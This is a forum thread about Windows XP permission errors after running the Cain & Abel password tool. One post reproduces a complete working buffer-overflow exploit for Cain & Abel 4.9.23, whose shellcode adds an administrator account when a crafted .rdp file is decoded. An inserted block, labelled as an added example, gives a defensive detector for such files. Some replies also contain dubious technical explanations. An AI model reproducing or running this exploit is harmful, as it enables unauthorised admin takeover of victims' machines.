Windows files permission question

Still_Learning
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
Location: Trigger City
Windows files permission question

Post by Still_Learning »

question.. I had my PC running for a couple days creating new rainbow tables using oxid's winrtgen program.. my PC froze up it seemed like and took forever, so I rebooted it then came to a boot error so I had to put in the Windows disc to recover the boot files, think it was a pci.sys file or something..

I uninstalled Cain and winrtgen and tried to reinstall, but every time I try to run the program now it gives me an error saying "Windows cannot access the specified device, path or file. You may not have appropriate permissions to access the item." Did my PC get owned or what.. how do I change the permission, as far as I know I'm the admin, I can do anything the admin can do, access the command prompt, go to admin tools, change user accounts, etc..

scratch that.. I tried to go to my user accounts and it was a blank screen that froze and said "Not responding". I have my PC backed up with Norton Ghost but would prefer not to have to use the backup image and figure out what is causing the error or problem
thanks

ebrizzlez
Kage
Posts: 732
Joined: 31 Mar 2007, 16:00
Location: Hidden in a Buffer Protection.

Post by ebrizzlez »

Sounds like Windows Vista to me. :roll:

If you can, boot into safe mode and try to uninstall the program. And use a registry cleanup program. Most likely there are registers that aren't fully cleaned yet and still have the program's path file name. Try installing in an alternative location if so.

On Vista if UAC is activated then kernel operands and operations take a bit longer because UAC has to verify that you have proper rights.

btw:
The crash probably resulted in an improperly dumped RAM, it happens a lot in Vista. If you rebooted hardboot [holding the shiny button down] then the RAM, Random Access Memory, can't be cleaned away properly and creates a page fault which Vista loads up and can't read properly so it normally crashes in these cases. Especially when it's doing important kernel operations.


Post by Still_Learning »

as far as I know it is a modded Windows XP Pro, also says Windows XP Essentials sometimes.. not Vista though

my first reaction was to uninstall it, I ran CCleaner and Wise Registry Checker to delete all the bad key strings. I also opened up CPorts and Process Explorer to see if anything weird was running out of the normal and did not see anything unusual. Maybe I need to download a new copy of Cain? The one I used was from a .rar/.zip format, from what I thought a .rar/.zip file cannot be infected after it's .zipped or archived.. would that be false to say?

I was running a program which is supposed to optimize my PC's RAM called FreeRam XP Pro, which may be doing more harm than what it's worth being installed? I have 2 GB RAM, dual core AMD 4000+

I got into the user accounts and there seems to be a new one now called "ASP.NET machine A's.." account with limited access / PW protected.. wtf


Post by ebrizzlez »

Windows XP Essential is a stripped down boot version of XP. It's probably missing a few tools, but normally it wouldn't matter. But sometimes these tools are necessary. Don't know.

Zip files can't actually be infected themselves, but the contents inside of the zips can. ;]

If you're so skeptical about security, download AVG.

Some programs, like GFI LanGuard, require making a new account on Windows so they can perform their operations on that account. It's weird, but that's how some programs are. So the ASP.NET account is probably used for a newly installed .NET program, the .NET framework is kind of weird.

Try redownloading Cain and switching the install directory, when generating rainbow tables make sure you don't have another program running. FreeRam XP probably just dumps unneeded RAM, but since rainbow tables use Time-Memory-Trade-Off the FreeRam program may be dumping RAM that is needed, it just doesn't know it, so the program has to regenerate those tables in memory again. Run FreeRAM XP before using Cain or rainbow tables, then make sure it's fully closed..

Recommend a system scan, but like I said, I highly doubt you're really in a serious infection.

rhysh
Fame ! Where are the chicks?!
Posts: 767
Joined: 15 Nov 2006, 17:00

Post by rhysh »

is the file actually there?

run FileMon and see if anything is accessing it

bad_brain
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
Location: In your eye floaters.

Post by bad_brain »

hm, I used winrtgen too some days ago, if you got it from oxid.it it is clean.
when running winrtgen it uses all available CPU resources, so the CPU load goes to 100%....that's normal, you can evade it by giving the process a lower priority by using Process Explorer for example.

as you know winrtgen needs no install, it's simply an exe, so the problem is most likely caused by Cain....Cain is labeled as malware by many AVs (hacktool :roll: ), so this is causing your problem I guess.


Post by Still_Learning »

run mon? what's that? The file is actually there, and I'm pretty sure my AV did not pick it up as a virus because it ran fine before for like 30 hours. I uninstalled / deleted both and am going to try and D/L it again then reinstall, yes I got it directly from Oxid's site, so it should be clean (unless of course Oxid put a backdoor in it, which I would not doubt)

How do I check for hidden processes? My computer seems to be running very slow lately. So by default it looks like the priority of everything is normal, if I change some processes that are not as important to low and others which slow the computer down like my AV to top priority will that speed it up? What exactly do the 24-4#'s mean next to the priority? Is that how many MB of RAM it is using?


Post by Still_Learning »

BTW.. I found a new exploit on Cain & Abel 4.9.23 (which I think is the newest version) dealing with buffer overflows..

Code:

#exploit.py
print ""
print "                 !R4Q!4N H4CK3R"
print "Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit"
print "By:Encrypt3d.M!nd"
print "encrypt3d.blogspot.com"
print "######################################################"
print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends"
print "This is exploit for my PoC"
print "Tested on:Windows Xp Sp3 Patched"
print "This exploit will Create File(.rdp) and when decoding"
print "The file with Cain(Remote Desktop Password Decoder)"
print "Will Add administrator user(user) with password(pass)"
print ""

# win32_adduser -  PASS=pass EXITFUNC=seh USER=user Size=232
# Encoder=PexFnstenvSub http://metasploit.com

shellcode = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46"
shellcode+= "\xcd\x10\x60\x83\xeb\xfc\xe2\xf4\xba\x25\x54\x60\x46\xcd\x9b\x25"
shellcode+= "\x7a\x46\x6c\x65\x3e\xcc\xff\xeb\x09\xd5\x9b\x3f\x66\xcc\xfb\x29"
shellcode+= "\xcd\xf9\x9b\x61\xa8\xfc\xd0\xf9\xea\x49\xd0\x14\x41\x0c\xda\x6d"
shellcode+= "\x47\x0f\xfb\x94\x7d\x99\x34\x64\x33\x28\x9b\x3f\x62\xcc\xfb\x06"
shellcode+= "\xcd\xc1\x5b\xeb\x19\xd1\x11\x8b\xcd\xd1\x9b\x61\xad\x44\x4c\x44"
shellcode+= "\x42\x0e\x21\xa0\x22\x46\x50\x50\xc3\x0d\x68\x6c\xcd\x8d\x1c\xeb"
shellcode+= "\x36\xd1\xbd\xeb\x2e\xc5\xfb\x69\xcd\x4d\xa0\x60\x46\xcd\x9b\x08"
shellcode+= "\x7a\x92\x21\x96\x26\x9b\x99\x98\xc5\x0d\x6b\x30\x2e\x3d\x9a\x64"
shellcode+= "\x19\xa5\x88\x9e\xcc\xc3\x47\x9f\xa1\xae\x7d\x04\x68\xa8\x68\x05"
shellcode+= "\x66\xe2\x73\x40\x28\xa8\x64\x40\x33\xbe\x75\x12\x66\xb8\x63\x05"
shellcode+= "\x34\xed\x60\x01\x35\xbe\x30\x4f\x07\x89\x54\x40\x60\xeb\x30\x0e"
shellcode+= "\x23\xb9\x30\x0c\x29\xae\x71\x0c\x21\xbf\x7f\x15\x36\xed\x51\x04"
shellcode+= "\x2b\xa4\x7e\x09\x35\xb9\x62\x01\x32\xa2\x62\x13\x66\xb8\x63\x05"
shellcode+= "\x34\xed\x3f\x21\x02\x89\x10\x60";

# and if you want to test it..this shellcode will open calc.exe
#shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2"
#shellcode+= "\xab\x63\x3d\x83\xeb\xfc\xe2\xf4\x4e\x43\x27\x3d\xb2\xab\xe8\x78"
#shellcode+= "\x8e\x20\x1f\x38\xca\xaa\x8c\xb6\xfd\xb3\xe8\x62\x92\xaa\x88\x74"
#shellcode+= "\x39\x9f\xe8\x3c\x5c\x9a\xa3\xa4\x1e\x2f\xa3\x49\xb5\x6a\xa9\x30"
#shellcode+= "\xb3\x69\x88\xc9\x89\xff\x47\x39\xc7\x4e\xe8\x62\x96\xaa\x88\x5b"
#shellcode+= "\x39\xa7\x28\xb6\xed\xb7\x62\xd6\x39\xb7\xe8\x3c\x59\x22\x3f\x19"
#shellcode+= "\xb6\x68\x52\xfd\xd6\x20\x23\x0d\x37\x6b\x1b\x31\x39\xeb\x6f\xb6"
#shellcode+= "\xc2\xb7\xce\xb6\xda\xa3\x88\x34\x39\x2b\xd3\x3d\xb2\xab\xe8\x55"
#shellcode+= "\x8e\xf4\x52\xcb\xd2\xfd\xea\xc5\x31\x6b\x18\x6d\xda\x5b\xe9\x39"
#shellcode+= "\xed\xc3\xfb\xc3\x38\xa5\x34\xc2\x55\xc8\x02\x51\xd1\x85\x06\x45"
#shellcode+= "\xd7\xab\x63\x3d";

eip = "\xB7\x2F\x49\x7E" #user32.dll jmp esp 0x7E492FB7

chars = "E"*8206
print "Bu!ld!ng 3xpl0!t....Pl3453 W4!t"
print ""
file = open('cain.rdp','w')
file.write (chars+eip+eip+"\x90"*10+shellcode)
file.close()
print "D0NE!"

# milw0rm.com [2008-12-03]

do you think this could be the case? RDP hack to my system, so 2 people have admin privileges, and locking me out of certain programs?
I had another program give me the same error today, it was Cooliris, after I did the Firefox plugin update. (It's some browser add-in that makes the web look like a wall of a bunch of pages, it is pretty alright)

I deleted all Cain and Abel stuff, keys, Cooliris, ran a virii check, but I think I will use another virii scanner also.

How do you read shellcode like that? Is that Python?
I apologize for the 1000 questions


Post by ebrizzlez »

Seems the code makes a file called cain.rdp and the assumed buffer overflow is injected into that file. So I doubt it's that actual exploit. buttt...

I would try to explain the code, but it's kinda complicated if you don't get shellcode. Basically, the shellcode is all in hex, and is just a bunch of memory values. The program doesn't have any remote features, there's no network protocols used, so it is not a remote exploit. It would have to be a local exploit, so if you opened up a .rdp file (remote desktop password decoder file) then the exploit would r00t you.

But as you described, you weren't dealing with remote desktop password decoder, or any of its file formats. So this isn't your case.
:wink:
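The script posted above writes a cain.rdp that looks nothing like a real one: a single line of 8206 padding bytes, a return address, a NOP sled and raw shellcode, which is what ebrizzlez's reply describes. As an added example (not from the thread, and not Cain's or the exploit author's code), here is how a defender could flag such a file before handing it to a parser. The .rdp line grammar, the length and byte-run thresholds and both sample files are assumptions constructed for this example; the posted shellcode is deliberately not reproduced.

```python
import re

# Well-formed .rdp lines look like "name:type:value", where type is
# s (string), i (integer) or b (binary hex). Assumed grammar for this check.
RDP_LINE = re.compile(rb"^[A-Za-z0-9 _\-]{1,64}:[sib]:.*$")
MAX_LINE = 1024   # assumption: no legitimate .rdp line comes near this length
MAX_RUN = 256     # assumption: a run of one byte this long is padding, not config


def rdp_findings(data):
    """Return a list of (line_no, reason) tuples; an empty list means clean.
    line_no 0 marks a whole-file finding."""
    findings = []
    if b"\x00" in data:
        findings.append((0, "NUL byte in a text format"))
    for no, line in enumerate(data.splitlines(), 1):
        line = line.rstrip(b"\r")
        if not line:
            continue
        if len(line) > MAX_LINE:
            findings.append((no, "line length %d exceeds %d" % (len(line), MAX_LINE)))
        # A settings file should be printable ASCII (tab allowed); a return
        # address, NOP sled or shellcode never is.
        if any((b < 0x20 or b > 0x7E) and b != 0x09 for b in line):
            findings.append((no, "non-printable bytes"))
        run = re.search(rb"(.)\1{%d,}" % (MAX_RUN - 1), line)
        if run:
            findings.append((no, "run of %d x %r" % (len(run.group(0)), run.group(1))))
        if not RDP_LINE.match(line):
            findings.append((no, "does not match name:type:value"))
    return findings


# Constructed benign sample in the expected name:type:value shape.
BENIGN = (b"screen mode id:i:2\r\n"
          b"full address:s:rdp.example.internal\r\n"
          b"username:s:analyst\r\n")

# Constructed sample shaped like the file the posted script writes: 8206 pad
# bytes, a 4-byte return address, a 10-byte NOP sled, then a stand-in for
# shellcode (0xCC bytes, NOT the shellcode from the post).
MALICIOUS = b"E" * 8206 + b"\xb7\x2f\x49\x7e" + b"\x90" * 10 + b"\xcc" * 16

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("exploit-shaped", MALICIOUS)):
        print(label, rdp_findings(blob) or "clean")
```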


Post by Still_Learning »

Yes, please let me know your conclusion. I have put a ban on Cain and Abel now and other programs giving me problems. I don't want to have to resort to my Ghost image backup, although it would be cool because I have not backed up an image from my USB drive to PC yet and it would be a learning experience.

Is shellcode its own code? Not related to assembly, BASIC, Fortran, Pascal, batch, etc..?? edit: no cain.rdp file was found.. also what's with Abel? I thought Abel was the remote/server, Cain is the client / 2 parts.. Cain and Abel